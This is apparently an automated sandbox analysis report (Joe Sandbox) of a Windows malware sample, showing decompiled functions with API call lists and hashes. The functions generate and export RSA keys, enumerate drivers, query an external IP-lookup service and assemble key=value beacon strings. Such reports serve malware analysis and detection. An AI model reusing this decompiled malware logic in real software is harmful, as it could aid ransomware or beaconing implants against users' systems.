						_v44 = 0x6e654774;
						_v40 = 0x646e6152;
						_v36 = 0x6d6f;
						_v34 = 0;
						_v32 = 0x61766441;
						_v28 = 0x32336970;
						_v24 = 0x6c6c642e;
						_v20 = 0;
						_t33 = GetModuleHandleA( &_v32);
						if(_t33 != 0) {
							L7:
							_t19 =  &_v48; // 0x70797243
							_t34 = GetProcAddress(_t33, _t19);
							if(_t34 != 0) {
								 *_t34(_v8, _v12, _v16);
								_t46 =  !=  ? 1 : _t46;
							}
						} else {
							_t18 =  &_v32; // 0x61766441
							_t33 = LoadLibraryA(_t18);
							if(_t33 != 0) {
								goto L7;
							}
						}
						CryptReleaseContext(_v8, 0);
						VirtualFree(_t47, 0, 0x8000); // executed
						goto L10;
					}
				}
			}

0x0f1d82b0
0x0f1d82b2
0x0f1d82b7
0x0f1d82bd
0x0f1d82c0
0x0f1d82c8
0x0f1d8392
0x0f1d839a
0x0f1d82ce
0x0f1d82ce
0x0f1d82d0
0x0f1d82d0
0x0f1d82d3
0x0f1d82d7
0x0f1d82d8
0x0f1d82e4
0x0f1d82e8
0x0f1d82ee
0x0f1d82f2
0x0f1d83a0
0x0f1d83ae
0x0f1d83bc
0x0f1d8301
0x0f1d8304
0x0f1d830c
0x0f1d8313
0x0f1d831a
0x0f1d8320
0x0f1d8324
0x0f1d832b
0x0f1d8332
0x0f1d8339
0x0f1d833d
0x0f1d8345
0x0f1d8355
0x0f1d8355
0x0f1d835a
0x0f1d8362
0x0f1d836d
0x0f1d8376
0x0f1d8376
0x0f1d8347
0x0f1d8347
0x0f1d834b
0x0f1d8353
0x00000000
0x00000000
0x0f1d8353
0x0f1d837e
0x0f1d838c
0x00000000
0x0f1d838c
0x0f1d82f2

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1D82C0
VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F1D82E8
GetModuleHandleA.KERNEL32(?), ref: 0F1D833D
LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1D834B
GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1D835A
CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D837E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D838C
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F1D292B), ref: 0F1D83A0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F1D292B), ref: 0F1D83AE

Strings

CryptGenRandomAdvapi32.dll, xrefs: 0F1D8355, 0F1D8358
Advapi32.dll, xrefs: 0F1D8347, 0F1D834A

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
API String ID: 3996966626-2152921537
Opcode ID: aa75496bdc973883f3b254fae8d24b6e2f97543dd4d03a3b4aabb0f928cb658e
Instruction ID: 3c0d2e818679f11ad184c7fd9d25a1dcea3d7d1d71c3f3cca77361015a74827e
Opcode Fuzzy Hash: aa75496bdc973883f3b254fae8d24b6e2f97543dd4d03a3b4aabb0f928cb658e
Instruction Fuzzy Hash: B231E471A02209BFDB10DFA5DC4ABEEBB78EF04712F104069FA05E2181D779DA10CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D62B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0F1D62B0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				long* _v8;
				long* _v12;
				int _v16;
				long** _t15;
				long* _t16;
				long _t23;

				_t15 =  &_v8;
				__imp__CryptAcquireContextW(_t15, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
				if(_t15 != 0) {
					L6:
					_t16 = _v8;
					__imp__CryptGenKey(_t16, 0xa400, 0x8000001,  &_v12); // executed
					if(_t16 == 0) {
					}
					_v16 = 0;
					__imp__CryptExportKey(_v12, 0, 6, 0, _a4, _a8);
					__imp__CryptExportKey(_v12, 0, 7, 0, _a12, _a16); // executed
					CryptDestroyKey(_v12);
					CryptReleaseContext(_v8, 0);
					__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0x10); // executed
					return 1;
				}
				_t23 = GetLastError();
				if(_t23 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8); // executed
				if(_t23 != 0) {
					goto L6;
				}
				return 0;
			}

0x0f1d62c1
0x0f1d62c5
0x0f1d62cd
0x0f1d6305
0x0f1d6313
0x0f1d6317
0x0f1d631f
0x0f1d631f
0x0f1d6322
0x0f1d633b
0x0f1d6353
0x0f1d635d
0x0f1d6369
0x0f1d637e
0x00000000
0x0f1d6384
0x0f1d62cf
0x0f1d62da
0x00000000
0x0f1d62fe
0x0f1d62eb
0x0f1d62f3
0x00000000
0x0f1d62fc
0x00000000

APIs

CryptAcquireContextW.ADVAPI32(0F1D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,0F1D49C6,?,0F1D49CE), ref: 0F1D62C5
GetLastError.KERNEL32(?,0F1D49CE), ref: 0F1D62CF
CryptAcquireContextW.ADVAPI32(0F1D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0F1D49CE), ref: 0F1D62EB
CryptGenKey.ADVAPI32(0F1D49CE,0000A400,08000001,?,?,0F1D49CE), ref: 0F1D6317
CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,?,00000000), ref: 0F1D633B
CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,?), ref: 0F1D6353
CryptDestroyKey.ADVAPI32(?), ref: 0F1D635D
CryptReleaseContext.ADVAPI32(0F1D49CE,00000000), ref: 0F1D6369
CryptAcquireContextW.ADVAPI32(0F1D49CE,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000010), ref: 0F1D637E

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0F1D62BA, 0F1D62E0, 0F1D6373

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Crypt$Context$Acquire$Export$DestroyErrorLastRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 137402220-1948191093
Opcode ID: 79cf3077d3e4379e5060d1fb973f0425470a6cfe31edcb31c75b46a393b26bdb
Instruction ID: c1f8a43f0f97cd52158af0a10486ed2f9239167fa4d114c2ecadb48a0c5fd98e
Opcode Fuzzy Hash: 79cf3077d3e4379e5060d1fb973f0425470a6cfe31edcb31c75b46a393b26bdb
Instruction Fuzzy Hash: D4216275781305BBEB20CFA0DD49FDE3779AB48B11F104608F705EA1C1D7BAA5609B61

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2F50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
memoryCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0F1D2F50(WCHAR* __ecx) {
				unsigned int _v8;
				char _v12;
				WCHAR* _v16;
				short _v2064;
				long _t17;
				void* _t18;
				void* _t20;
				WCHAR* _t23;
				int _t25;
				void* _t28;
				unsigned int _t31;
				void* _t35;
				intOrPtr* _t39;
				signed int _t40;

				_t39 = __imp__EnumDeviceDrivers;
				_v16 = __ecx;
				_v8 = 0;
				 *_t39( &_v12, 4,  &_v8); // executed
				_t17 = _v8;
				if(_t17 != 0) {
					_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
					_t35 = _t18;
					if(_t35 != 0) {
						_t20 =  *_t39(_t35, _v8,  &_v12, _t28); // executed
						if(_t20 == 0) {
							L10:
							VirtualFree(_t35, 0, 0x8000); // executed
							return 0;
						} else {
							_t40 = 0;
							_t31 = _v8 >> 2;
							if(_t31 > 0) {
								do {
									_t23 =  &_v2064;
									__imp__GetDeviceDriverBaseNameW( *((intOrPtr*)(_t35 + _t40 * 4)), _t23, 0x400); // executed
									if(_t23 == 0) {
										goto L9;
									} else {
										_t25 = lstrcmpiW( &_v2064, _v16); // executed
										if(_t25 == 0) {
											VirtualFree(_t35, 0, 0x8000);
											return 1;
										} else {
											goto L9;
										}
									}
									goto L12;
									L9:
									_t40 = _t40 + 1;
								} while (_t40 < _t31);
							}
							goto L10;
						}
					} else {
						return _t18;
					}
				} else {
					return _t17;
				}
				L12:
			}

0x0f1d2f5a
0x0f1d2f69
0x0f1d2f6d
0x0f1d2f74
0x0f1d2f76
0x0f1d2f7b
0x0f1d2f8d
0x0f1d2f93
0x0f1d2f97
0x0f1d2fa8
0x0f1d2fac
0x0f1d2ff2
0x0f1d2ffa
0x0f1d3008
0x0f1d2fae
0x0f1d2fb1
0x0f1d2fb3
0x0f1d2fb8
0x0f1d2fc0
0x0f1d2fc5
0x0f1d2fcf
0x0f1d2fd7
0x00000000
0x0f1d2fd9
0x0f1d2fe3
0x0f1d2feb
0x0f1d3011
0x0f1d3022
0x00000000
0x00000000
0x00000000
0x0f1d2feb
0x00000000
0x0f1d2fed
0x0f1d2fed
0x0f1d2fee
0x0f1d2fc0
0x00000000
0x0f1d2fb8
0x0f1d2f99
0x0f1d2f9e
0x0f1d2f9e
0x0f1d2f81
0x0f1d2f81
0x0f1d2f81
0x00000000

APIs

K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F1D2F74
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F1D2F8D

Strings

i)w, xrefs: 0F1D2FE3

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: AllocDeviceDriversEnumVirtual
String ID: i)w
API String ID: 4140748134-1280834553
Opcode ID: 531842312953670ef59d5a44c9ee3ae1c9c2d990d512d0a9e536643cbd309976
Instruction ID: c8b0520ef7bf34bebb40e4f641241c291312d004d37f0dc93bcad36f032c2720
Opcode Fuzzy Hash: 531842312953670ef59d5a44c9ee3ae1c9c2d990d512d0a9e536643cbd309976
Instruction Fuzzy Hash: 8C210B32B41229BBEB20DE98DC81FEDB7BCEF44711F0001A6FE04D6181D775A9659BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 56stringmemorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 0F1D7CE0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F1D7EC4
Part of subcall function 0F1D7CE0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F1D7EDD

VirtualAlloc.KERNEL32(00000000,00002801,00003000,00000040,772966A0,?), ref: 0F1D6EAF
lstrlenW.KERNEL32(0F1DFF0C), ref: 0F1D6EBC

Part of subcall function 0F1D7EF0: InternetCloseHandle.WININET(?), ref: 0F1D7F03
Part of subcall function 0F1D7EF0: InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0F1D7F22

lstrlenA.KERNEL32(00000000,ipv4bot.whatismyipaddress.com,0F1DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F1D6EEB
wsprintfW.USER32 ref: 0F1D6F03
VirtualFree.KERNELBASE(00000000,00000000,00008000,ipv4bot.whatismyipaddress.com,0F1DFF10,00000000,00000000,00000000,000027FF,?,00000000), ref: 0F1D6F19
InternetCloseHandle.WININET(?), ref: 0F1D6F27

Strings

ipv4bot.whatismyipaddress.com, xrefs: 0F1D6EDC
GET, xrefs: 0F1D6EC4

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpenVirtuallstrlen$AllocConnectFreewsprintf
String ID: GET$ipv4bot.whatismyipaddress.com
API String ID: 4289327240-2259699238
Opcode ID: 643fd66cad311f91e039cdfb80d4fdf38c6f1e17ef0ad89fdc2d274ce3e13d6e
Instruction ID: ed75be333d5317458356403e9c0aae4d070f9b7449fa2742e64aa36e987ce765
Opcode Fuzzy Hash: 643fd66cad311f91e039cdfb80d4fdf38c6f1e17ef0ad89fdc2d274ce3e13d6e
Instruction Fuzzy Hash: 1301D83274221477DB24AA659C4EF9B3E3CEF86B62F000424FA05E10C2DF6C5676C6A5

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D7CE0 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1D7CE0(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0f1d7cf8
0x0f1d7d04
0x0f1d7d0f
0x0f1d7d19
0x0f1d7d23
0x0f1d7d2d
0x0f1d7d37
0x0f1d7d41
0x0f1d7d4b
0x0f1d7d55
0x0f1d7d5f
0x0f1d7d69
0x0f1d7d73
0x0f1d7d7d
0x0f1d7d87
0x0f1d7d91
0x0f1d7d9b
0x0f1d7da5
0x0f1d7daf
0x0f1d7db9
0x0f1d7dc3
0x0f1d7dcd
0x0f1d7dd7
0x0f1d7de1
0x0f1d7deb
0x0f1d7df2
0x0f1d7df9
0x0f1d7e00
0x0f1d7e07
0x0f1d7e0e
0x0f1d7e15
0x0f1d7e1c
0x0f1d7e23
0x0f1d7e2a
0x0f1d7e31
0x0f1d7e38
0x0f1d7e3f
0x0f1d7e46
0x0f1d7e4d
0x0f1d7e54
0x0f1d7e5b
0x0f1d7e62
0x0f1d7e69
0x0f1d7e70
0x0f1d7e77
0x0f1d7e7e
0x0f1d7e85
0x0f1d7e8c
0x0f1d7e93
0x0f1d7e9a
0x0f1d7ea1
0x0f1d7ea8
0x0f1d7eaf
0x0f1d7eb6
0x0f1d7ebd
0x0f1d7ec4
0x0f1d7ec6
0x0f1d7ecb
0x0f1d7edd
0x0f1d7edf
0x00000000
0x0f1d7edf
0x0f1d7ee8

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F1D7EC4
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F1D7EDD

Strings

, xrefs: 0F1D7E07
G, xrefs: 0F1D7E38
K, xrefs: 0F1D7DE1
8, xrefs: 0F1D7E8C
8, xrefs: 0F1D7E7E
L, xrefs: 0F1D7E1C
l, xrefs: 0F1D7D19
a, xrefs: 0F1D7D23
o, xrefs: 0F1D7E5B
, xrefs: 0F1D7E93
M, xrefs: 0F1D7D04
0, xrefs: 0F1D7D37
A, xrefs: 0F1D7DB9
7, xrefs: 0F1D7DF9
t, xrefs: 0F1D7DEB
3, xrefs: 0F1D7E85
7, xrefs: 0F1D7EB6
T, xrefs: 0F1D7E15
h, xrefs: 0F1D7E54
, xrefs: 0F1D7D91
., xrefs: 0F1D7E70
., xrefs: 0F1D7E77
K, xrefs: 0F1D7E0E
i, xrefs: 0F1D7D4B
c, xrefs: 0F1D7E3F
i, xrefs: 0F1D7E2A
5, xrefs: 0F1D7E69
a, xrefs: 0F1D7E9A
5, xrefs: 0F1D7D2D
o, xrefs: 0F1D7E46
, xrefs: 0F1D7E4D
e, xrefs: 0F1D7DCD
e, xrefs: 0F1D7E31
, xrefs: 0F1D7E23
1, xrefs: 0F1D7D87
), xrefs: 0F1D7DAF
, xrefs: 0F1D7D69
e, xrefs: 0F1D7E62
e, xrefs: 0F1D7DD7
5, xrefs: 0F1D7DF2
5, xrefs: 0F1D7EAF
(, xrefs: 0F1D7D41
w, xrefs: 0F1D7D5F
O, xrefs: 0F1D7D9B
d, xrefs: 0F1D7D55
6, xrefs: 0F1D7DA5
3, xrefs: 0F1D7EBD
3, xrefs: 0F1D7E00
p, xrefs: 0F1D7DC3
6, xrefs: 0F1D7D7D
T, xrefs: 0F1D7D73
a, xrefs: 0F1D7EA1
z, xrefs: 0F1D7D0F
i, xrefs: 0F1D7EA8

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: 05a01e8e16522e87669fa1debc8665ce6a975675f97d13a019ff3364452e01b9
Instruction ID: 18c3962725b16863424857878b86ae58e2a9b7727e717c08c8ace90b5546f2c0
Opcode Fuzzy Hash: 05a01e8e16522e87669fa1debc8665ce6a975675f97d13a019ff3364452e01b9
Instruction Fuzzy Hash: AF41A8B4811358DEEB21CF919998B9EBFF5BB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D6F40 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1D6F40(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0f1d6f44
0x0f1d6f47
0x0f1d6f58
0x0f1d6f61
0x0f1d6f69
0x0f1d6f72
0x0f1d6f7a
0x0f1d6f7a
0x0f1d6f7f
0x0f1d6f85
0x0f1d6f8d
0x0f1d6f93
0x0f1d6f9b
0x0f1d6f9b
0x0f1d6fa1
0x0f1d6fa7
0x0f1d6faf
0x0f1d6fb5
0x0f1d6fbd
0x0f1d6fbd
0x0f1d6fc3
0x0f1d6fc9
0x0f1d6fd1
0x0f1d6fd7
0x0f1d6fdf
0x0f1d6fdf
0x0f1d6fe5
0x0f1d6feb
0x0f1d6ff3
0x0f1d6ff9
0x0f1d7001
0x0f1d7001
0x0f1d7007
0x0f1d700d
0x0f1d7015
0x0f1d701b
0x0f1d7023
0x0f1d7023
0x0f1d7029
0x0f1d702f
0x0f1d7037
0x0f1d703d
0x0f1d7045
0x0f1d7045
0x0f1d704b
0x0f1d7051
0x0f1d7059
0x0f1d705f
0x0f1d7067
0x0f1d7067
0x0f1d706d
0x0f1d7073
0x0f1d707b
0x0f1d7081
0x0f1d7089
0x0f1d7089
0x0f1d708f
0x0f1d709c
0x0f1d70a2
0x0f1d70a5
0x0f1d70aa
0x0f1d70c7
0x0f1d70ac
0x0f1d70b6
0x0f1d70bc
0x0f1d70d4
0x0f1d70dc
0x0f1d70e2
0x0f1d70ea
0x0f1d70f6
0x0f1d70f6
0x0f1d7100
0x0f1d7106
0x0f1d710e
0x0f1d7114
0x0f1d711c
0x0f1d711c
0x0f1d7128
0x0f1d7132

APIs

lstrcatW.KERNEL32(?,?), ref: 0F1D6F61
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D6F69
lstrcatW.KERNEL32(?,?), ref: 0F1D6F72
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D6F7A
lstrcatW.KERNEL32(?,?), ref: 0F1D6F85
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D6F8D
lstrcatW.KERNEL32(?,?), ref: 0F1D6F93
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D6F9B
lstrcatW.KERNEL32(?,?), ref: 0F1D6FA7
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D6FAF
lstrcatW.KERNEL32(?,?), ref: 0F1D6FB5
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D6FBD
lstrcatW.KERNEL32(?,?), ref: 0F1D6FC9
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D6FD1
lstrcatW.KERNEL32(?,?), ref: 0F1D6FD7
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D6FDF
lstrcatW.KERNEL32(?,?), ref: 0F1D6FEB
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D6FF3
lstrcatW.KERNEL32(?,?), ref: 0F1D6FF9
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D7001
lstrcatW.KERNEL32(?,?), ref: 0F1D700D
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D7015
lstrcatW.KERNEL32(?,?), ref: 0F1D701B
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D7023
lstrcatW.KERNEL32(?,0F1D4966), ref: 0F1D702F
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D7037
lstrcatW.KERNEL32(?,?), ref: 0F1D703D
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D7045
